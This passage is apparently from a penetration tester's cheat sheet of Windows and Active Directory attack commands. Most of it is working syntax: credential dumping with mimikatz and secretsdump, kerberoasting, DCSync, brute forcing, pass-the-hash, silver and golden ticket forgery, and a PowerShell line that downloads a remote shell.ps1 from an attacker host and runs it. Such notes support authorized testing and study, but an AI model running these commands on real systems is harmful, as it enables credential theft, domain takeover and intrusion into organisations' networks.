              • If mimikatz is launched from a SYSTEM shell, this step can be skipped
          • Dump SAM contents (Security Account Manager)
            • lsadump::sam
          • Dump NTLM hash
            • sekurlsa::logonpasswords
              • This will dump the credentials of all users currently logged into the workstation or server.
                • Includes remote logins like RDP sessions
              • If WDigest is enabled Mimikatz will reveal cleartext passwords alongside hashes (Windows 7)
    • ERROR kuhl_m_sekurlsa_acquireLSA; Key import
      • Newer Windows update makes it so mimikatz versions 2.2.0 and newer do not work. Must use an older version of mimikatz.
  • Other tools such as samdump2, pwdump, fgdump, and Windows Credential Editor (wce) work well against older Windows OS's such as XP or Server 2003
  • impacket-secretsdump
    • Dump hashes locally
      • impacket-secretsdump -sam <SAM file> -security <SECURITY file> [-system <SYSTEM file>] LOCAL

    Active Directory

  • Authentication
    • NTLM
      • Used when clients authenticate to a server by IP (instead of hostname) or if a user attempts to authenticate to a hostname that is not registered on the AD DNS server. 3rd party applications can also choose NTLM instead of Kerberos.
      • NTLM hashes can be cracked very quickly
    • Kerberos
  • ntds.dit file
    • Database stored on DC that contains all active directory information including password hashes for all users in the domain
    • C:\windows\ntds\
    • Can use SYSTEM file to decrypt the ntds.dit and extract all the information from it
      • impacket-secretsdump -ntds <ntds.dit file> -system <SYSTEM file> [-security <SECURITY file>] LOCAL
        • Additional Useful flags:
          • -pwd-last-set If user has multiple accounts and changes password in same timeframe then likey all passwords are the same
            -user-status Tells if the account is disabled or not
            -history Windows will show the last 24 used passwords for each user
        • Grep the ntds dump
          • grep -v 'aes[12]\|des-cbc
          • grep -v history0
  • Brute force valid users amd pre-auth attack
    • kerbrute
      • pre-auth attack tool. Will validate user existence.
      • Can lock out users but will not generate 4625 event code which is logged by default. The event code it does generate is not logged by default.
      • kerberute userenum --dc apt -d <domain> <user list>
  • Kerberoast
    • Mimikatz/manual
    • Purge all current tickets kerberos::purge
      Enumerate SPNs GetUserSPNs.ps1
      Request security token for SPN
    • Add-Type -AssemblyName System.IdentityModel
    • New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '<SPN - Example:HTTP/>'
    • export TGS ticket kereberos::list /export or PS > klist
      Turn output into hashcat hash kirbi2hashcat
    • Rubeus
      • .\r.exe kerberoast /creduser:domain\<user> /credpassword:<password>
    • impacket-GetUserSPNs
      • impacket-GetUserSPNs -dc-ip <dc ip> <domain name>/<user to request ticket as>:<password> -request-user <kerberoastable user>
    • if port 88 is inaccessible from kali machine
    • Forward port 88 & 389 to Kali chisel.exe client R:88: R:389:localhost:389
      Get hash for kerberoastable users -request -dc-ip <domain>/<user>
  • DCSync
    • Retrieve all domain password data via domain replication protocols.
    • Tools/Methods
      • Impacket-SecretsDump '<username>:<password>@<ip address>'
        • Attack remotely. Generates network traffic. Does not have to deal with AV or other problems on victim machine.
      • .\Mimikatz.exe 'lsadump::dcsync /domain:<domain name> /user:administrator' exit
        • Attack locally. Reduced network traffic.
  • Brute force credentials with smb and winrm
    • crackmapexec winrm/smb -u <username> -p <password> or -H <hash>
      • SMB brute forcing can be detected and banned by some AD setups
  • Enumerating AD Users and Groups
  • net user Shows local user accounts
    net user /domain Shows all domain user accounts
    net user <user> /domain Shows all domain user accounts
    net group /domain Shows all groups on the domain
  • Fix clock skew
    • Check clock skew
      • nmap
        • sudo nmap -p445 -sV -sC <ip address>
        • Look for clock-skew: mean: <value> deviation: <clock skew time> median: <value>
      • ntpdate -q <server ip>
    • Check local time (on Kali)
      • date
    • Change local time (on Kali)
      • date -s <Time>
        • <Time> Format
          • HH:MM:SS
      • ntpdate <server ip>
  • Check domain
    • crackmapexec smb <ip>

    Credential Usage

  • impacket-psexec
    • If user has ability to write to a SMB share
  • impacket-wmiexec uses same syntax
    • wmiexec does not require writing to SMB
  • impacket-psexec <username>@<ip address> -hashes LM:NTLM
  • impacket-psexec <username>:<password>@<ip address>
  • impacket-psexec <username>@<ip address>
    • Will prompt for password. Works when password has bad characters that are throwing off the command.
  • Run powershell command as other user
  • Method 1 Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://<ip address>/shell.ps1')" -Credential $cred
    Method 2 Invoke-Command -ComputerName <computer name> -Credential $cred -ScriptBlock {whoami}
    Method 3
  • Powershell-Suite/Runas.ps1
  • Invoke-RunAs -User <username> -Password <password> -LogonType <0x1 or 0x2> -Binary powershell.exe -Args <powershell command>
  • Pass the hash
  • pth-winexe - Pass the hash
    • Used to authenticate via the SMB protocol
    • Example: pth-winexe –U <username>%<hash - Must be formatted LM_Hash:NT_Hash> //<ip address> cmd
  • winexe - password
  • winexe -U '<username>%<password>' //<ip address> cmd.exe
  • winexe -U '<username>%<password>' --system //<ip address> cmd.exe
  • evil-winrm
  • evil-winrm -i <ip address> -u <user> -p <password>
  • evil-winrm -i <ip address> -u <user> -H <NTLM>
  • Forward winrm ports to localhost .\chisel.exe client <local/chisel ip>:<chisel server port> R:5985:localhost:5985 R:5986:localhost:5986

    Overpass the Hash

  • Turn NTLM hash into Kerberos ticket to avoid the use of NTLM authentication
    • Retrieve NTLM hash for user
      • Mimikatz
        • Privilege::debug
        • Sekurlsa::logonpasswords
    • Authenticate with NTLM hash – Powershell session under context of other user
      • Mimikatz
        • Sekurlsa::pth /user:<username> /domain:<domain – ex.> /ntlm:<NTLM hash> /run:powershell.exe
    • Generate TGT by authenticating to a network share on DC – can use any command that requires domain permissions
      • Net use \\<Domain Controller – ex. dc01>
    • Check for cached Kerberos ticket
      • Klist
    • Run PsExec inside powershell session that is running under context of other user
      • .\PsExec.exe \\<domain controller – ex. dc01> cmd.exe

    Silver Ticket

  • Forge TGS using a service account password or NTLM hash in order to access any resources that the service account has permissions to
  • If the SPN is used on multiple servers the ticket can be leveraged against them all.
  • Creation Instructions - With local shell
    • Get domain SID
      • Whoami /user
        • SID is everything except the last section of digits
    • mimikatz
      • Get rid of pre-existing kerberos tickets
        • Kerberos::purge
      • Verify Kerberos tickets are purged
        • Kerberos::list
      • Forge silver ticket
        • Kerberos::golden /user:<username> /domain:<domain ex.> /sid:<domain SID – whoami /user SID except last section of #'s> target:<fully qualified host name of service – ex.> /service:<service type – ex. HTTP> /rc4:<service account hash> /ppt (inject into memory)
          • Rc4/hash section requires knowledge of service account password. If password is known, we can hash it.
      • Verify ticket has been created
        • Kerberos::list
  • Creation Instructions - Remote
  • Get NTLM hash of SPN password Might need to make sure it is lowercase
    Get domain SID
  • impacket-getPac -targetUser <user (i.e. administrator)> <credentials>
  • Use impacket-getPac against a user, the domain SID will be included in the output
  • Generate silver ticket
  • impacket-ticketer -domain <Domain> -domain-sid "<Domain SID>" -nthash "<SPN Password Hash>" -spn <SPN> <Username>
    • Example: impacket-ticketer -domain scrm.local -domain-sid "S-1-5-21-2743207045-1827831105-2542523200" -nthash "B999A16500B87D17EC7F2E2A68778F05" -spn mssqlsvc/dc1.SCRM.local administrator

    Golden Ticket

  • Gives access to anything and everything
  • Requires the password or hash for the service account krbtgt
  • Must have access to an account that is a member of the domain admins group or have access to the domain controller itself.
  • Creating the golden ticket does not require admin privileges and can be performed on a computer not joined to the domain.
  • Creating golden ticket on Linux
    • Get krbtgt hash
      • impacket-SecretsDump
    • Get domain SID
      • On Windows
        • PS > Get-ADDomain <Domain>
    • impacket-ticketer
      • impacket-ticketer -nthash <krbtgt ntlm hash> -domain-sid <domain sid> -domain <Domain Name> <Username>
    • export KRB5CCNAME=<output .cache file from impacket-ticketer command>
    • psexec <domain>/<username>@<ip address> -k -no-pass
      • Try adding domain names to /etc/host file before running
        • Try DNS names instead of ip address in command
      • psexec will always login as SYSTEM
        • switch to wmiexec to login as Administrator instead of SYSTEM
  • Creating the golden ticket on windows
    • Get domain SID & krbtgt hash
      • mimikatz: privilege::debug
      • mimikatz: lsadump::lsa /patch
    • Purge kerberos tickets
      • mimikatz: kerberos::purge
    • Create golden ticket
      • mimikatz: kerberos::golden /user:fakeuser / /sid:s-1-5-<sid> /krbtgt:<krbtgt hash /ptt>
    • Launch new command prompt
      • misc::cmd
    • Attempt lateral movement with psexec
      • Psexec.exe \\<domain controller> cmd.exe

    Read GMSA Password

  • $gmsa = Get-ADServiceAccount <GMSA Account> -Properties msDS-ManagedPassword
  • $mp = $gmsa.'msDS-ManagedPassword'
  • ConvertFrom-ADManagedPasswordBlob $mp
  • $pwd = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
    • If 'CurrentPassword' shows a bunch of gibberish, then the password is 256 bytes of psuedorandom data interpreted as 128 UTF-16 characters.
  • Convert to NTLM hash: ConvertTo-NTHash $pwd

  • Setup Linux as a Router

  • Send all traffic from Linux to Windows and back
    • Usage example: Find a Windows application on the victim that communicates with a port on a victim machine. Run that program from an attacking Windows host but route the traffic through Kali.
  • Source: Ippsec, Sharp -
  • Forward traffic from one interface to another and vice versa
  • Check if ip forwarding is enabled
    • sudo sysctl -a | grep ip_for
      • net.ipv4.ip_forward = 1 = enabled
      • if net.ipv4.ip_forward = 0
        • sudo echo 1 > /proc/sys/net/ipv4/ip_forward
  • Linux Setup
  • Forward traffic from tun0 to eth0
  • sudo iptables -A FORWARD -i tun0 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
  • Forward traffic from eth0 to tun0
  • sudo iptables -A FORWARD -i eth0 -o tun0 -j ACCEPT
  • Change source IP from eth0 back to tun0
  • sudo iptables -t nat -A POSTROUTING -s <eth0 CIDR range> -o tun0 -j MASQUERADE
  • Windows setup
  • Send traffic directed towards victim ip to linux ip route add <victim ip> <linux ip>

    Convert vbs file to one line

    Remove comments
  • Find:'.*
  • Replace:
  • Remove continuation lines
  • Find: _.*\n
  • Replace:
  • Replace tabs
  • Find:\t
  • Replace:
  • Replace newlines with :
  • Find:\n
  • Replace::
  • Replace double :: with single :
  • Find:::
  • Replace::